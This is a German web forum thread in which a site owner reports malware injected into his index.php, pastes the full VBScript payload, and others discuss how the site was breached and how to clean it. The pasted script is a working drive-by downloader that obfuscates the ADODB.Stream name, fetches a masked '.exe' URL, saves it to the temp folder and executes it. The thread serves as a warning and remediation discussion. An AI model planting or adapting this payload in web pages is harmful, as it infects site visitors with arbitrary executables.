Hallo

Routinemässig überprüfte ich meine Website auf Validation und enddeckte 5 Fehler die nur ein paar Tage alt sein konnten. Ich begann den Fehler zu suchen und fand ein Virus in der index.php
Als ich die index.php herunterladen wollte schlug mein Virenscaner Alarm. Laut Virenscanner ist es ein:


HTML/Rce.Gen - Malware

Name: HTML/Rce.Gen
Entdeckt am: 14/08/2007
Art: Trojan
In freier Wildbahn: Ja
Gemeldete Infektionen: Niedrig
Verbreitungspotenzial: Niedrig
Schadenspotenzial: Niedrig
Statische Datei: Nein
Engine Version: 7.04.01.62

Unten in rot die Malware:

?><script language="VBscript">
On Error Resume Next

url = "******.exe"
Set xml = document.createElement("object")
xml.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set HTP = xml.CreateObject("Microsoft.XMLHTTP", "")

S1 = "Ad"
S2 = "od"
S3 = "b."
S4 = "ST"
S5 = "re"
S6 = "am"

Set AdbS = xml.CreateObject(S1 & S2 & S3 & S4 & S5 & S6, "")
AdbS.Type = 1

HTP.open "GET", url, False
HTP.Send

Set FSO = xml.CreateObject("Scripting.FileSystemObject", "")
Set tmp = FSO.GetSpecialFolder(2)
FileName = FSO.GetFileName(url)
FileName = FSO.BuildPath(tmp, FileName)

AdbS.open
AdbS.write HTP.responseBody
AdbS.SaveToFile FileName, 2
AdbS.Close

Set WSH = xml.CreateObject("Shell.Application", "")
WSH.ShellExecute FileName, "", "", "open", 1

</Script>

Ich habe jetzt alle Passwörter geändert. Ich hoffe das reicht. Seit also vorsichtig und checkt eure Webseiten ab und zu.



Gruss space

Danke für den Hinweis.
Benutzt du ein OpenSource CMS oder hast du was selbst geschrieben?

Gib mal die URL her...

Es ist davon auszugehen, dass die Index.php über ein Sicherheitsloch verändert wurde.

Hallo

Es handelt sich um ein sehr gutes, stabiles und auch sicheres CMS. Ich habe es dem Sicherheitsteam schon gemeldet und die schauen es sich näher an. Allerdings laufen unter demselben Space noch weitere Scripte und so kann ich nicht mit Sicherheit sagen, wo das Leck liegt.
Auf jeden Fall lösche ich alle Dateien und und installiere eine Sicherungskopie die ich durch den Virenscanner geprüft habe.


Das überprüfen der Dateien ist einfach. Alles per FTP herunterladen und dann schlägt der Virenscanner des PCs Alarm, falls eine Datei verseucht ist.

Gruss space

Das bringt Dir nix...

Kleines BEispiel.

Der Schadcode wird via JS von einem anderen Webspace nachgeladen somit ist Deine Website für den Virenscanner sauber.

Hallo SD

Ich denke das geht schon. Ich lösche ja die ganze Webpräsenz und lade nur geprüfte Dateien hoch. Da kann danach kein Code mehr versteckt sein.

Gruss space

Ein sehr gutes Gegenmittel dagegen ist das kostenlose Script "CrawlTrack". Es wird einfach per FTP auf den Server geladen und durch eine einfache Zeile in der index.php im Rootverzeichnis aktiviert.

Hervorragend ist auch die Analyse zur Indexierung Deiner Seite von Suchmaschinenbots.

Das Script erhälst Du hier: http://www.crawltrack.fr/

Bin für jede Frage hierzu offen.

Ich nutze es in Verbindung mit Joomla seit einer Woche nach einem fiesen Hack und habe bereits erfolgreich über 100 diverse Hackversuche abgewehrt ;-)

Gruss

Aber an einem include eines externen JS ist nix zu erkennen...

Hallo Flipper

Super Idee! Das probiere ich gleich aus.

space

Hallo SD

Ich probiere mal den Tip von Flipper aus und installiere die diversen Scripts neu. Da warten ein paar Stunden Arbeit

gruss space

@sd12
Woran erkennst du, dass JavaScript im Spiel ist?

Nein, ich erkenne das nicht, aber es könnte auf IRGENDEINER anderen Seite z.B. Schadhafter Code via Javascript nachgeladen werden....

Das betrübliche am Ganzen ist, das ich nur durch die Fehler im XHTML darauf gestossen bin.
Würde ich nicht so stark auf Validierung von HTML und CSS achten, wäre mir das nie aufgefallen.

Gruss space

Das ist völlig irrelevant.

Eines der vorhandenen Scripte hat diese Lücke ermöglicht.

Solange das drauf bleibt, kann das Sekunden nach dem Aufspielen erneut gehackt werden. Sprich: Download, Offline-Überprüfung und Hochladen ist bloß Beschäftigungstherapie.

Aktuell würde nur helfen, PHP und alle anderen Scripte komplett abzuschalten - bis der Fehler gefunden ist.

Auch das Ändern von Passwörtern ist irrelevant. Das ist wahrscheinlich eine Folge des erfolgreichen Hacks - aber nicht das Einfallstor.

Hallo jAuer

Das habe ich inzwischen leider auch feststellen müssen

Ich lösche deshalb alle bestehenden Scripte und installiere die jeweils neuste Version. Auch wenn das viel Arbeit bedeutet ist dies wohl die beste Lösung.

gruss space

Mal für die dicken, kleinen, Doofen: was macht denn das Script überhaupt?

Es ist auch möglich, dass jemand einen Trojaner oder ähnliches spionage Programm
auf einem PC installiert hat, ( Automatisiert )
die Zugangsdaten mitloggt und nun zugriff auf den FTP server besitzt.

Dann hat das mit den scripten garnichts zu tun !

So, jetzt habe ich die Scripts neu installiert und zusätzlich das kleine Script "CrawlTrack". http://www.crawltrack.fr

Der erste Angriff wurde schon abgewehrt und ich werde das Script nun auf all meinen Projekten einsetzen.

In der Hoffnung auf Ruhe vor Hackern

Gruss space

@memoriam

=> Das File "******.exe" wird heruntergeladen

=> File (exe) wird gespeichert

=> File (exe) wird gestartet. Und zwar auf Lokal, auf dem Rechner des Users.

Was das exe macht, weiss der Geier. Stell Dir das schlimmste vor, genau das wäre möglich. Ist das gleiche wie wenn du einen Doppelklick auf eine .exe machst.

Sofern die Sicherheitseinstellungen Deines Browsers und Systemes nicht allzu hoch sind, kann das exe fast alles ausführen.

Gruss

Spaceman007

Das wollte ich Dir vor ein paar Stunden erklären :-)